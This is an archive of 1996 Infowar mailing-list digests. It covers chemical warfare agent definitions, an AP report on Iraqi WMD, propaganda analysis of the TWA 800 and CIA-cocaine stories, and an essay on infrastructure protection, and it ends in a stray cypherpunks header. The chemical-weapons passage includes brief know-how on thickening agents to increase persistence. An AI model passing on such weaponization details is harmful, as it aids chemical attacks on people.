employed because of their direct toxic effects on man, animals and plants 
... ".
The Chemical Weapons Convention defines chemical weapons as including not 
only toxic chemicals but also ammunition and equipment for their 
dispersal.  Toxic chemicals are stated to be " ... any chemical which,
through its
chemical effect on living processes, may cause death, temporary loss of
performance, or permanent injury to people and animals". Plants are not
mentioned in this context.

Toxins, i.e., poisons produced by living organisms and their synthetic
equivalents, are classed as chemical warfare agents if they are used for
military purposes. However, they have a special position since they are
covered by the Biological and Toxin Weapons Convention of 1972. This
convention bans the development,production and stockpiling of such
substances not required for peaceful purposes.

Today, thousands of poisonous substances are known but only a few are
considered suitable for chemical warfare. About 70 different chemicals 
have been used or stockpiled as CW agents during the 20th century. Today, only 
a few of these are considered of interest owing to a number of demands that 
must be placed on a substance if it is to be of use as a CW agent.

A presumptive agent must not only be highly toxic but also "suitably 
highly toxic" so that it is not too difficult to handle. The substance 
must be capable of being stored for long periods in containers without
degradation and without corroding the packaging material. It must be
relatively resistant to atmospheric water and oxygen so that it does not
lose effect when dispersed. It must also withstand the heat developed when 
dispersed.
>>
"War Gases" are Seldom Gases
>>
CW agents are frequently called war gases and a war where CW agents are
used is usually called a gas war. These incorrect terms are a result of
history. During the First World War use was made of chlorine and phosgene 
which are gases at room temperature and normal atmospheric pressure. The 
CWagents used today are only exceptionally gases. Normally they are liquids 
or solids. However, a certain amount of the substance is always in 
volatile form (the amount depending on how rapidly the substance evaporates)
and the gas concentration may become poisonous. Both solid substances and
liquids can also be dispersed in the air in atomized form, so-called
aerosols. An aerosol can penetrate the body through the respiratory organs
in the same way as a gas. Some CW agents can also penetrate the skin. This
mainly concerns liquids but in some cases also gases and aerosols. Solid
substances penetrate the skin slowly unless 
they happen to be mixed with a suitable solvent.

Effects on Vegetation

Flowers and leaves of some plants may change colour if they are exposed to 
droplets of a CW agent in an attack. Light or matt spots may occur as well 
as brown discoloration, particularly on leaves. Entire trees, or parts of 
them, may also get brown discoloration in situations of strong exposure.
The discoloration often arises within a few minutes but may also occur
after some days.

Classification

CW agents can be classified in many different ways. There are, for 
example, volatile substances, which mainly contaminate the air, or persistent
substances, which are involatile and therefore mainly cover surfaces.
CW agents mainly used against people may also be divided into lethal and
incapacitating cathegories. A substance is classified as incapacitating if 
less than 1/100 of the lethal dose causes incapacitation, e.g., through
nausea or visual problems. The limit between lethal and incapacitating
substances is not absolute but refers to a statistical average. In
comparison, it may be mentioned that the ratio for the nerve agents 
between the incapacitating and lethal dose is approximately 1/10. Chemical
warfare agents are generally also classified according to their effect on the
organism.

In order to achieve good ground coverage when dispersed from a high
altitude with persistent CW agents the dispersed droplets must be
sufficiently large to ensure that they fall within the target area and do 
not get transported elsewhere by the wind. This can be achieved by
dissolving polymers (e.g., polystyrene or rubber products) in the CW agent 
to make the product highly-viscous or thickened. The result will be that
the persistence time and adhesive ability increase which thus complicates 
decontamination.

Although it may appear that a CW agent can be "custom-made" for a certain 
purpose, this is not the case. Instead, there is always some uncertainty
about the persistence time, the dispersal and the effect.

These Military Chemicals are Not Considered to be Chemical Weapons

Incendiary agents such as napalm and phosphorus are not considered to be 
CW agents since they achieve their effect mainly through thermal energy.
Certain types of smoke screen may be poisonous in extremely high
concentrations but, nonetheless, smoke ammunition is not classed as a
chemical weapon since the poisonous effect is not the reason for their 
use. Plants, microorganisms, algae, etc. which produce toxins are not classed 
as chemical weapons even if the produced toxins belong to that class.
Pathogenic microorganisms, mainly viruses and bacteria, are classed as
biological weapons.

--------------------------------------

From:   "Wilson, Gary, COL, OSD/RA" <GWilson@osd.pentagon.mil>
Subject:  Iraq: WMD
Date:      Fri, 1 Nov 1996 08:24:37 -0500

   WASHINGTON (AP) -- Before and during the 1991 Persian Gulf War, truck
convoys carried Iraqi chemical and biological weapons, as well as nuclear
material to safe haven in Iran, according to U.S. intelligence documents. 
>   "The trucks were camouflaged with mud during their travel through Iraqi
>territory," said the report placed Thursday on the Internet. "The convoy moved
>only at night. The mud was washed off after re-entry into Iranian territory." 
>   The report said "at least 14 trucks were identified as having nuclear,
>biological and chemical cargo. Boxes labeled 'tularemia,' 'anthrax,'
'botulinum' and 'plague' were loaded into containers." 
>   The trucks were driven by Iranian civilians who turned them over to Iranian
>Revolutionary Guards. 
>   That account was among more than 200 documents placed on the Internet over
>the objections of the CIA. They were put on the worldwide computer network by
>publisher Bruce W. Kletz, who plans to put out a book by a former CIA analyst,
>Patrick Eddington. 
>   Eddington asserts that the agency has hidden evidence that American troops
>were exposed to Iraqi chemical weapons. 
>   "These documents are still under review," CIA spokesman Mark Mansfield said.
>"We consider portions of them to be classified." 
>   The Pentagon originally put the material on the Internet and then
withdrew it in February when the CIA objected to making it public. 
>   While numerous studies have found no conclusive evidence that Iraqi forces
>used chemical or biological weapons against U.S. troops during the 1991 war, it
>is feared U.S. forces could have been exposed to nerve gas as they destroyed an
>Iraqi munitions dump after the war's end. 
>   Iraq's transfer of material to Iran was a new example of cooperation between
>two countries that fought an eight-year war but became covert allies when a
>U.S.-led coalition demanded that Iraq withdraw forces that occupied Kuwait in
>August 1990. 
>   During the ensuing Persian Gulf War, Iran allowed Iraqi planes to land
on its territory to escape destruction by coalition forces. The planes were not
allowed to rejoin the Iraqi military during the conflict. 
>   The documents did not shed new light on whether U.S. forces came into
contact with Iraqi chemical weapons. But they did show the concern about Iraq's ability to manufacture and deploy such weapons. 
>   One document cited a defector's account that "at least one chemical company
>is attached to each (Iraqi) division." 
>   Russia may have supplied biological warfare technology to Iraq and North
>Korea, according to a report written in 1994. "It was believed that the
>technology transfer commenced several years prior to April 1992 and was
still in progress during April 1992," the report said. 
>   The material also indicated the government had evidence that Iraq had moved
>chemical weapons into Kuwait. 
>   One report in January 1991, from an Iraqi national, said that chemical land
>mines had been loaded for shipment to Kuwait. The report said the information
>"cannot be confirmed." 
>   In September 1990, less than two months after Iraq occupied Kuwait, evidence
>was seen that "Iraqi forces may be conducting chemical decontamination
>exercises. They could be preparing for a chemical attack." 
>   During the same period, when the United States and its allies were massing
>forces in the Persian Gulf region, U.S. officials were concerned that
terrorists
>allied with Iraqi President Saddam Hussein would stage attacks on allied
forces.
>
>   Among the records returned to the Internet is a Nov. 3, 1995, memo
written by Paul Wallner, a Pentagon official heading an oversight panel dealing with Gulf War veterans' illnesses. 
>   Noting that various military officials and departments had "expressed
concern about potential sensitive reports or documents on GulflINK," the Persian Gulf War web site, Wallner recommended certain steps to "allow the investigation
team time to begin preparation of a response on particular 'bombshell' reports." 
>   According to the memo, a host of material would be subject to further
review, including "documents containing releasable information which could
embarrass the government or DoD," the Department of Defense. 
>   It also warned that additional scrutiny would be needed on documents "that
>could generate unusual public/media attention" or those "which seem to confirm
>the use or detection of nuclear, chemical or biological agents." 

-------------------------------------------------------
Notes from Moderator: 

1. GulfLINK documents can now be downloaded from infowar.com   

2. WEAPONS OF MASS DESTRUCTION IN TERRORISM
The Emerging Threat Posed by Non-State Proliferation, James K. Campbell is an interesting read.  The article is posted on infowar.com under the What's New section.

--------------------------------------------------------

ate: Tue, 29 Oct 1996 12:22:27 -0700
To: winn@Infowar.Com
From: alm@io-online.com
Subject: RE: Chemical Warfare Agents
Cc: "Wilson, Gary, COL, OSD/RA" <GWilson@osd.pentagon.mil>,
 betty@infowar.com, 'Ron Lewis' <INTELLIGYST@worldnet.att.net>

I think we have an excellent example of the psychological impact of
chemical weapons in the case of Israel right now.  The news statements
about land for peace in the Golan came shortly after new gas masks were
issued in Israel and I got curious.  I went back and checked the news
database and found that speeches recomending not serving in the IDF, that
students should leave Israel, and a wide variety of other self defeating
actions peaked at about one week after news of chemical weapons threats,
issueing of gas masks, and other news of this type appeared in the papers
there.  This comes after a long period of stress and being on high alert.
Early reactions seem to be panic, after a period of such stress it seems
make people (at least in this situation) turn in on themselves, willing to
abandon strongly held beliefs, etc. without knowingly tieing it to the
threats.  The attacks seemed aimed not at the threats but at the government
of Israel; yet, they are tied time-wise to increased pressure.  This was
traced over a two year period which gives some validity rather than a
one-time relationship.

I hate to say it, but this is an excellent laboratory for a variety of such
studies as it isn't artificial and its one of the few places where open
information is available on on-going threats of various types.
Sociologists have already done studies on behavior in society and such
using this lab.

Alijandra
------------------------------------------------------

END

Infowar             Sunday, November 10 1996        Volume 01: Number 01


DIRECT REQUESTS to:    list@infowar.com with one-line in the BODY, NOT
in the subject line.

Subscribe infowar        TO JOIN GROUP
Unsubscribe infowar    TO LEAVE GROUP
Help infowar               TO RECEIVE HELP 
TO POST A MESSAGE:  E-Mail to   infowar@infowar.com  

_____________________________________________________
Infowar.Com
Interpact, Inc.
Winn Schwartau
winn@infowar.com
http://www.infowar.com
813-393-6600  Voice
813-393-6361  FAX

Sponsor Opportunities/Comments/Help

Betty G. O'Hearn
Assistant to Winn Schwartau
http://www.infowar.com
betty@infowar.com
813-367-7277  Voice
813-363-7277  FAX



--------------------------------------------------------------------------
2                                Message:0002                            2
--------------------------------------------------------------------------
To: infowar@infowar.com
From: "Betty G. O'Hearn" <betty@infowar.com>
Subject: Infowar Digest  Vol. 1  #2


infowar@infowar.com=20

             Sunday, November 10  1996  Volume 01: Number 02

                               We thank our sponsors:

National Computer Security Association
OPEN SOURCE SOLUTIONS
New Dimensions International - Security Training
Secure Computing Corporation
HOMECOM Communications
Internet Security Solutions
__________________________________________________
Infowar@infowar.com is brought to you in the  the interest of an open,=
 unclassified exchange of information and ideas as a means for advancement=
 of Information Warfare related issues.   Topics of discussion for this list=
 include:  Infowar, Electronic Civil Defense, Hacking, Defensive Techniques,=
 Policy, Non-Lethals, Psyops, Chemical Warfare Agents and WMD.=20

As the list expands we will adapt to the needs and desires of our=
 subscribers.=20

This is a DIGEST format.
__________________________________________________________

Contents  Vol. #1  No.2

infowar   Original Allegations - Flt 800 Disaster
infowar   Propaganda and TWA/CIA-Cocaine
infowar   Electronic Civil Defense

-------------------------------------------
To: winn@Infowar.Com
Date: 8 Nov 1996 14:33:38 CST
Subject: Original Allegations - Flt. 800 Disaster

ENN Special Report
11/08/96 - 13:45CST

Original Allegations of Friendly Fire Came From Alleged Iranian
Propagandist

(ENN) In light of yesterday's statements by former JFK Press Secretary
Pierre Sallinger, the Emergency Response & Research Institute conducted
an internal literature review of documents regarding the TWA Flight 800
disaster.  This internal probe included e-mail, newsgroup postings,press=
 reports, and consultations with experts, received from numerous sources. =
 It revealed that the original allegations of a U.S. Naval "friendly fire=
 incident" came from an alleged Iranian/Extremist Moslem propagandist named=
 Parveez Syad, aka Parveez Hussein, who was operating from a base in=
 Birmingham, England at the time.  Interestingly, Mr.Hussein/Syad=
 distributed these allegations widely on the Internet within 48 hours of the=
 incident and made what appeared to be premature accusations that the United=
 States was already engaged in a "cover-up."

Mr. Hussein/Syad's current whereabouts are unknown, and it is believed
that he may have been the subject of a government investigation in
England. Concerns were raised, at the time, by ERRI analysts that Mr.
Syad/Hussein may have been engaged in an "disinformation" campaign in an=
 effort to deflect attention from possible moslem extremist involvement
in the bombing of Flt. 800. Subsequent inquiries and examinations by
ERRI seem to verify that there was a concerted "foreign" effort to obscure=
 and confuse a number of issues involved in the Flt. 800 investigation.

Speculation continues among experts in regard to the authenticity of the
alleged U.S. government documents that are reportedly in the possession
of Mr. Sallinger. Without examination of these documents, ERRI analysts
say that further confirmation of Mr. Sallinger's statement is difficult
at best. One purposefully unidentified consultant told ENN that it is
even possible that Mr. Sallinger and French intelligence agents may have
been "duped" by a "foreign effort."

U.S. Navy and FBI officials have both "catagorically denied" any viable
evidence of a "friendly fire" incident or of any sort of "cover-up" on
the part of the U.S. government. James Kallstrom announced today that he
would welcome any additional information or evidence that Mr. Sallinger
or others might have in regard to the Flight #800 tragedy.

EmergencyNet News Service (ENN)
Emergency Response & Research Institute (ERRI)
6348 N. Milwaukee Ave., #312
Chicago, IL. 60646
(773) 631-3774 - Voice
(773) 631-4703 - Fax
(773) 631-3467 - Modem/Emergency BBS On-Line
-------------------------------------

Date: Fri, 8 Nov 96 16:26 EST
From: Michael Wilson <0005514706@mcimail.com>
To: G-TWO List Members <g-two@majordomo.netcom.com>
Subject: Propaganda and TWA/CIA-Cocaine

Many of you may be dealing with questions regarding the two matters, so
I thought I would make this available to you.

---
Two recent events in the media are prompting my writing a very brief=
 commentary:
allegations of a cover-up in the TWA Flight 800 disaster and the alleged=20
CIA-Cocaine connection into the L.A. urban environment. My comments will be=
 directed at the propaganda value of these media events, as I'm currently=
 engaged in writing a primer on propaganda, and these make interesting case=
 studies.

Modern propaganda comes in many forms, but of primary concern in these two=
 cases are:
- 'Mobile truth,' or the reinterpretation of events (revisionist history), a=
=20
common feature on the Internet, which is increasingly becoming an entry=
 point into the more conventional media;
- Psyops in support of operations, including spin control, after action=
 reports,or informative accounts when the media is controlled by=
 intelligence and law enforcement;
- The digital nature of media--text, photographs, video, audio--has=
 undermined the ability to establish the reality of what they represent as=
 observational proxies. This has recently been termed the 'fictive=
 environment' by the military, and I'll use the term for lack a better one.

Let me discuss the two cases in terms of these points:

TWA 800
Ever since Flt. 800 went down, the conspiracy theorists have been out on the=
 Internet, alleging everything from a Syrian missile to a 'friendly fire'=20
accident. Part of these allegations have been blind assertions, but some=
 have=20
been backed up with 'proof' that entails supposed photographs and internal=
=20
government documents.

Mobile truth: in the absence of public facts or knowledge, speculation has=
 run wild. As usual, everyone's favorite pet suspect emerges--terrorists,=
 the U.S. Navy, government cover-ups, etc. This 'playing to the audience'=
 has received wide audience and coverage, because it is media hot--it=
 attracts a lot attention simply because it receives attention in the=
 viewers, readers, etc. in a self-fulfilling way. It plays on public and=
 hidden fears; provides simple=20
solutions; gives an enemy to hate, react against; it justifies the beliefs=
 and=20
agenda of many. The only solution is to provide facts, hopefully answers; of=
=20
course, this is antithetical to the investigatory (scientific and criminal)=
=20
process. This vacuum of data is being capitalized on by individuals or=20
organizations who know that the official channels are going to be closed to=
 the public--their motive is something I have no desire to quantify.

PsyOps: this game is lose-lose for everyone; the public is confused and=
 angered, the investigation is hampered or discredited, the sources of the=
 false information will eventually be shown to be wrong (although they will=
 launch secondary operations to manage this as well, alleging further=
 cover-up, conspiracy, and so forth). What happens though is a continual=
 lessening of the resistance in the information environment to future psyops=
 operations, and this is the long term benefit sought by the perpetrators.=
 Confidence in the government is at an all time low--post Viet Nam,=
 Watergate, Iran-Contra, Whitewater, etc. The readiness to believe the worst=
 becomes greater and greater, and public mental health suffers.

Fictive environment: while ground truth comes from direct observation, we're=
 becoming more dependent upon observational proxies than ever=
 before--photos, audio, video, documents, etc. The memories of observers is=
 a questionable thing at best (the madness of crowds), but digital trickery=
 are removing the trust values that we, only a few years ago, were able to=
 place in 'more reliable' materials. In the case of TWA, just as in most any=
 case, the creation or faking of evidence requires only modest skills and a=
 personal computer. Photos can be digital from their origin, and once=
 transferred into a computer with the right software, they can be merged or=
 altered in ways that are=20difficult to refute, even when false. Documents=
 are trivial to manufacture; elements used for provenance, showing a truth=
 and history of origin, can be falsified in a variety of ways (optically=
 scanning letterhead or signature, creation from scratch by matching=
 typeset, etc.), and the textual body can be anything imagined (and textual=
 analysis or comparison is commonly beyond the capabilities of the=
 audience). Video and audio are slightly more complex (in levels of effort);=
 video modification, loosely based on the same technology used to alter=
 photographs, requires greater skill and more powerful equipment, but is=
 gradually coming into the range of the average consumer, just as audio=
 sampling and modification technology has reached the 'garage' level. All=
 this calls into question any materials of physical evidence, but those=
 distributed over the Internet are particularly ntrustworthy--even the lower=
 resolution of net-distribution works to the advantage of the creation of=
 such materials. I expect this problem to have increasing impact as time=
 goes on, including in criminal and civil cases (for instance, in the Yousef=
 case in New York, where he claimed his computer files were faked, or the=
 potential falsification of photographic evidence in the Simpson civil=
 trial).

In short, the discussion and materials on/using the Internet have done=
 little to advance the search for the truth of the matter in TWA 800, and=
 have done much harm (diverting critical manpower from the investigation,=
 damaging the credibility of the investigation, etc.).

CIA-Cocaine connection
TWA and this accusation actually have much in common from a propaganda=
 standpoint. The allegation (made by the San Jose Mercury News) was that=
 assets associated with the CIA-backed effort in support of the Contras were=
 trafficking in cocaine, which helped to finance the (c)overt war. In=
 particular, the cocaine smuggled into the U.S.A. was supposed to have been=
 converted into the 'crack' or rock (smokable) form, and introduced into the=
 African-American urban setting in Los Angeles, with the undertones being=
 that it was a conspiracy to undermine the solidarity of the A-A community.

Mobile truth: the basic assertion never actually connected the CIA with any=
=20
involvement or trafficking, yet the implication (made indirectly or=
 directly,=20
depending on the source) was that it was a tacit CIA operation. Far be it=
 for me to write the apologia for the Agency, but not only is the supposed=
 action=20
illegal and immoral, it is also highly unlikely. Creative interpretation of=
 the=20
events allowed a rather clever ontological judo--the all-powerful,=
 all-knowing CIA either had to admit they had no idea what their assets were=
 involved in (thus damaging the all-knowing aspect of their reputation);=
 they could admit to knowledge but inaction (thus criminal facilitation, or=
 having to say that sometimes they need the help of 'bad' people, not a=
 politically correct position); or they could deny any involvement, and=
 foster the continual suspicion of cover-up, conspiracy, and hidden agendas.=
 Any way they move, they lose. This is again a position where history has=
 created an impression that the Agency would perform the worst action in=
 support of their own agenda,=20and then actively protect themselves from=
 investigation; no amount of reform or whitewashing can reverse the trend.=
 The strength of this attack on the credibility of the Agency is that it=
 plays so well with public impressions of the Agency, appears to fit the=
 profile of previous Agency violations of public trust, but can't be=
 defended against because of the secrecy requirements of the Agency, and the=
 improbable success of proving a negative assertion (that the Agency wasn't=
 responsible).

PsyOps: a factor to consider is that the accusations were made during an=20
election period in a key state where the issue solidified a constituency=
 into a=20
solid position against their 'traditional' opposition. The issue is very=
 much a=20
political one, and directed at rekindling public animosity about past deeds=
 (and misdeeds) to shape current public impressions. Again, the long term=
 casualties of all this are the public trust and credibility of a key but=
 troubled Agency; politically expedient attacks which undermine the=
 political process; and the continued progression of the perversion of the=
 information environment.

Fictive environment: no proof was actually offered (mostly proof by=
 assertion, as well as collateral association), but the very absence of=
 proof feeds in to the mobile truth and psyops elements of the operation.=
 Clearly no public documentation and argument could be offered from an=
 Agency that must maintain its security and integrity, and no proof could be=
 offered to prove the Agency wasn't involved, a negative assertion (a common=
 element in this sort of propaganda operation).

The CIA, Congress, and Justice Department are now engaged in investigations=
 of the allegations; as such, they will be on-going events to continue the=
 propaganda campaign, with a predictable end--the Agency finds no proof in=
 their records and interviews, which is then interpreted as continuing=
 evidence of a cover-up and conspiracy.

Conclusion-- Media manipulation, particularly using the Internet as a method=
 of propagation of the propaganda message or as an entry point into the=
 conventional media cycle, is becoming more of a problem. Clearly everyone=
 suffers, and the general atmosphere of distrust and disbelief, not to=
 mention disgust, prevail.

Michael Wilson
5514706@mcimail.com
------------------------------------------
To:     infowar@infowar.com
From: winn@infowar.com
Date:  November 8, 1996
Subj:  Electronic Civil Defense Becomes a National Issue

In June of 1991, I testified before Congress that unless we moved forward as=
 a nation, we faced the possible specter of an "Electronic Pearl Harbor."=
 Five years to the day later, that same phrase was used by John Deutch and=
 others to wake up Congress and America that indeed a new concept of=
 national security has evolved as the Cold War wound down.

I recently ran into a Libertarian friend and lawyer who was somewhat upset=
 with me. "You are single handedly responsible for the backlash and efforts=
 of law enforcement to take away our personal freedoms." He was referring to=
 the comments made by FBI Director Louis Freeh, that additional electronic=
 eavesdropping capabilities were needed to thwart the threats of domestic=
 terrorism. He also referred to various law enforcement concerns that unless=
 US citizens voluntarily complied with a Key Escrow scheme of some variety,=
 it might be necessary to legislate a common cryptographic system which=
 would not interfere with government investigations into crime and=
 terrorism.

"So, it's all my fault?" I asked him in the presence of others.

He paused, and with only a twinge of humor said, "yes."

Well, I do not believe or accept for a moment that the work we have done in=
 the last several years is solely responsible for the extreme measures being=
 discussed, but my friend's concerns are legitimate and must be addressed.=
 He is keenly concerned, as many of us are, that recent headline grabbing=
 events may trigger law enforcement to overreact and with the emotional=
 support of many Americans, permit laws to be passed that a few short years=
 ago we never would have tolerated.

Civil Libertarians are quick to point out that if we permit law enforcement=
 to regain unbridled powers of electronic eavesdropping, we provide them=
 with the capability of abuse.

"Today's government may be fine. But we don't know about tomorrow's=
 government." They openly refer to the abuses of the Hoover FBI where, most=
 of will admit, things did get out of hand. I've met with CIA case officers=
 who feel hamstrung by their inability "to get the job done" in an effective=
 way, because they are paying for the sins of their predecessors. Most of=
 the FBI agents I know understand the legitimate fears of the civil=
 liberties groups, but also know that they must have increased access to=
 technology to defeat criminal activities.

The issue comes down to one of balance. Pure and simple. "Whom do you trust"=
 is a high profile collateral issue.=20

But let's understand what has catalyzed much of these moves on the part of=
 law enforcement:

	- The Oklahoma City bombing
	- The World Trade Center bombing
	- The Lockerbie Tragedy
	- The US Military Bombing in Saudi Arabia
	- TWA Flight 800
	- The Olympic Bombing

These events trigger deep emotional responses on the part of most Americans=
 and a call for action. "What can we do?" "Do something." "This shouldn't=
 happen in America." "Protect us." And the predictable response from law=
 enforcement is to ask for additional powers. Balance. It's all about=
 balance.

The critics say that Law Enforcement can push electronic taps past friendly=
 judges with little inquiry on their part. The FBI says it takes a mass of=
 paper work and evidence to convince a judge. There were less than 2,000=
 phone taps issued last year - and I guess I feel that's not a whole lot.=
 260,000,000 people, less than 2,000 taps. You add it up.=20

Resources on the part of law enforcement are pretty scant. They do not have=
 the budget or manpower to indiscriminately tap phones everywhere and=
 analyze their contents. It's manpower intensive. They have to be selective.=
 In many ways I wish they listened in on more of the bad guys. On one phone=
 tap, an FBI agent told me, their target said in a taped conversation, "hey,=
 the feds are tapping the phone. Let's whisper." Bad guys are not all rocket=
 scientists.

But on a national scale, we do indeed face a new risk, a new vulnerability,=
 for which my friend blames me. It's all my fault. Right. In "Information=
 Warfare" and other works, I maintained that the civilian infrastructure was=
 the unacknowledged target of future adversaries.

I don't believe we will see Submarines sailing up the Potomac, or that enemy=
 planes will come into San Francisco Bay. Just won't happen. But I fear we=
 will see attacks against the econo-technical infrastructure, affecting not=
 only we citizens, but the ability of law enforcement and the military to=
 function as we wish them to.

On July 15 of this year, President Clinton issued an Executive Order calling=
 for the Establishment of  President's Commission on Critical Infrastructure=
 Protection.

I applaud much of it, but I also think we have to maintain caution on how it=
 is effected. His order says:

Certain national infrastructures are so vital that their incapacity or=
 destruction would have a debilitating impact on the defense or economic=
 security of the United States.

These critical infrastructures include:

 telecommunications,
 electrical power systems,
 gas and oil storage and transportation,
 banking and finance,
 transportation,
 water supply systems,
 emergency services (including medical, police, fire, and rescue), and
 continuity of government.

Threats to these critical infrastructures fall into two categories:

1. physical threats to tangible property ("physical threats"),

2. and threats of electronic, radio-frequency, or computer-based attacks on=
 the information or communications components that control critical=
 infrastructures ("cyber threats").

Because many of these critical infrastructures are owned and operated by the=
 private sector, it is essential that the government and private sector work=
 together to develop a strategy for protecting them and assuring their=
 continued operation.

This part of President Clinton's statement is right on the mark. These are=
 all critical structures of the macro-sized econo-technical infrastructure,=
 of which the NII and other bits are sub-infrastructures. However, when it=
 comes to forming a committee, the people and groups he wishes to handle the=
 problem are quite government-centric.

	- Department of the Treasury;
	- Department of Justice;
	- Department of Defense;
	- Department of Commerce;
	- Department of Transportation;
	- Department of Energy;
	- Central Intelligence Agency;
	- Federal Emergency Management Agency;
	- Federal Bureau of Investigation;
	- National Security Agency.

The committee members are to include:

	- Secretary of the Treasury;
	- Secretary of Defense;
	- Attorney General;
	- Secretary of Commerce;
	- Secretary of Transportation;
	- Secretary of Energy;
	- Director of Central Intelligence;
	- Director of the Office of Management and Budget;
	- Director of the Federal Emergency Management Agency;
	- Assistant to the President for National  Security Affairs;
	- Assistant to the Vice President for National Security Affairs.

The immediate concern I see is that the government wants to take charge on=
 an issue and threat that is of mutual concern to the private sector and the=
 government, but that at the highest levels of the President's Order and his=
 Committee, we see no private sector representation. It is merely on a=
 consultory basis.

The Commission shall:

        (a) within 30 days of this order, produce a statement of its mission=
 objectives, which will elaborate the general objectives set forth in this=
 order, and a detailed schedule for addressing each mission objective, for=
 approval by the Steering Committee;

        (b) identify and consult with: (i) elements of the public and=
 private  sectors that conduct, support, or contribute to infrastructure=
 assurance; (ii) owners and operators of the critical infrastructures; and=
 (iii) other elements of the public and private sectors, including the=
 Congress, that have an interest in critical infrastructure assurance issues=
 and that may have differing perspectives on these issues;

        (c) assess the scope and nature of the vulnerabilities of, and=
 threats to, critical infrastructures;

        (d) determine what legal and policy issues are raised by efforts to=
 protect critical infrastructures and assess how these issues should be=
 addressed;

        (e) recommend a comprehensive national policy and implementation=
 strategy for protecting critical infrastructures from physical and cyber=
 threats and assuring their continued operation;

        (f) propose any statutory or regulatory changes necessary to effect=
 its recommendations; and

        (g) produce reports and recommendations to the Steering Committee as=
 they become available; it shall not limit itself to producing one final=
 report.

I first wrote a National Infomation Policy in 1993, and I am pleased to see=
 that the President has included similar wording. However, a national policy=
 must, on balance, also provide for enhanced personal electronic security=
 for the average American. It cannot be a one-sided law enforcement issue.=
=20

I worry about "consult with industry" along the same lines that the Key=
 Escrow adherents consulted with industry, but generally did what they=
 wanted to anyway. This has been an ongoing battle between industry and the=
 White House with respect to "Clipper" style proposals and export control=
 over encryption. Do we face the same situation with the Infrastructure=
 Protection Committee?

In this same vein, the President did recognize some input by the private=
 sector:

(a) The Commission shall receive advice from an advisory committee=
 ("Advisory Committee") composed of no more than ten individuals appointed=
 by the President from the private sector who are knowledgeable about=
 critical infrastructures. The Advisory Committee shall advise the=
 Commission on the subjects of the Commission's mission in whatever manner=
 the Advisory Committee, the Commission Chair, and the Steering Committee=
 deem appropriate.

Again, the structure is that the government is in charge and the private=
 sector, whose very interests are at stake here, is reduced to an Advisory=
 status. This is a keen focus of concern.

But then, a surprising phrase was in the President's Order:

(f) The Commission, the Principals Committee, the Steering Committee, and=
 the Advisory Committee shall terminate 1 year from the date of this order,=
 unless extended by the President prior to that date.

Only a year. I've been at this for years and years, and the awareness=
 process takes significant time. There are still major players both in the=
 government and the private sector who do not understand the nature of the=
 threats and vulnerabilities, and I fear that a mere one year effort, led by=
 some of the busiest people in the country today, will not receive the=
 attention it deserves.

My Civil Libertarian lawyer friend had significant problems with the=
 following portion of the President's Order (for which I am blamed, of=
 course!).

(a) While the Commission is  conducting its analysis and until the President=
 has an opportunity to consider and act on its recommendations, there is a=
 need to increase  coordination of existing infrastructure protection=
 efforts in order to better address, and prevent, crises that would have a=
 debilitating regional or national impact.  There is hereby established an=
 Infrastructure Protection Task Force ("IPTF") within the Department of=
 Justice, chaired by the Federal Bureau of Investigation, to undertake this=
 interim coordinating mission.

(d) The IPTF shall include at least one full-time member each from the=
 Federal Bureau of Investigation, the Department of Defense, and the=
 National Security Agency.  It shall also receive part-time assistance from=
 other executive branch departments and agencies. Members shall be=
 designated by their departments or agencies on the basis of their expertise=
 in the protection of critical   infrastructures.  IPTF members'=
 compensation shall be paid by their parent agency or department.

"Oh, great!" he exclaimed. "Now we're gonna have the Army sitting with=
 M-16's outside the phone company, and the NSA listening in on Americans to=
 see if they pollute the water supply. This is too damned much." He=
 shuddered at the thought of having the these three groups working together=
 on a domestic basis. It brought back to him too many memories of bygone=
 days he would like to see remain in the past.

On the other hand, what better group than the DoD to head up an effective=
 response organization? The President, rightfully so, put the FBI and the=
 Dept. of Justice in charge of the IPTF; after all they are responsible for=
 domestic national law enforcement. But the DoD has massive resources,=
 capabilities and manpower to deploy in times of trouble.

The trouble is, and we will have to face this dilemma straight on, is that=
 the US Military cannot be deployed in domestically due to the Posse=
 Comitatus Act of 1878, without an Executive Order. And the NSA is similarly=
 restricted from domestic operation, but is standing up its own 1,000 man=
 Information Warfare division.=20

There are legitimate ways around these problems, and we do need to have=
 built-in oversights to satisfy the concerns of those who don't want the=
 government taking over the whole shebang. But the concept of the IPTF's=
 mission is again, absolutely on mark.

(e) The IPTF's function is to identify and coordinate existing expertise,=
 inside and outside of the Federal Government, to:

(i) provide, or facilitate and coordinate the provision of, expert guidance=
 to critical infrastructures to detect, prevent, halt, or confine an attack=
 and to recover and restore service;

(ii) issue threat and warning notices in the event advance information is=
 obtained about a threat;

(iii) provide training and education on methods of reducing vulnerabilities=
 and responding to attacks on critical infrastructures;

(iv) conduct after-action analysis to determine possible future threats,=
 targets, or methods of attack; and

(v)  coordinate with the pertinent law enforcement authorities during or=
 after an attack to facilitate any resulting criminal investigation.

The Committee is supposed to address the very issues that many of us have=
 been addressing - to full audiences, but often empty years. From where I=
 stand, the White House has caught the vision and it prepared to do=
 something about it.

My complaints are essentially two fold:

	1. We have to have greater civilian input and representation on the=
 Committee at the highest levels, not merely in an advisory capacity.

	2. The 1 year term is short-sided.

And yes, I do agree with my Libertarian pal, that however this all shakes=
 out, we must have a third party oversight process to insure we never do=
 return to the abusive days of yore.

Kudos to the White House for putting Electronic Civil Defense on their=
 plate.

For a complete copy of the Presidential Order: http://www.infowar.com

Winn Schwartau
------------------------------------------------------------

END

Infowar             Sunday, November 10 1996        Volume 01: Number 02


DIRECT REQUESTS to:    list@infowar.com with one-line in the BODY, NOT
in the subject line.

Subscribe infowar        TO JOIN GROUP
Unsubscribe infowar    TO LEAVE GROUP
Help infowar               TO RECEIVE HELP=20
TO POST A MESSAGE:  E-Mail to   infowar@infowar.com =20

_____________________________________________________
Infowar.Com
Interpact, Inc.
Winn Schwartau
winn@infowar.com
http://www.infowar.com
813-393-6600  Voice
813-393-6361  FAX

Sponsor Opportunities/Comments/Help

Betty G. O'Hearn
Assistant to Winn Schwartau
http://www.infowar.com
betty@infowar.com
813-367-7277  Voice
813-363-7277  FAX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tom bryce <tjb@acpub.duke.edu>
Date: Sun, 10 Nov 1996 21:37:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ideal secure personal computer system
In-Reply-To: <v02140b02aeac593a7aa7@[192.0.2.1]>
Message-ID: <l03010608aeac1fa442cc@[152.3.87.2]>
MIME-Version: 1.0
Content-Type: text/plain


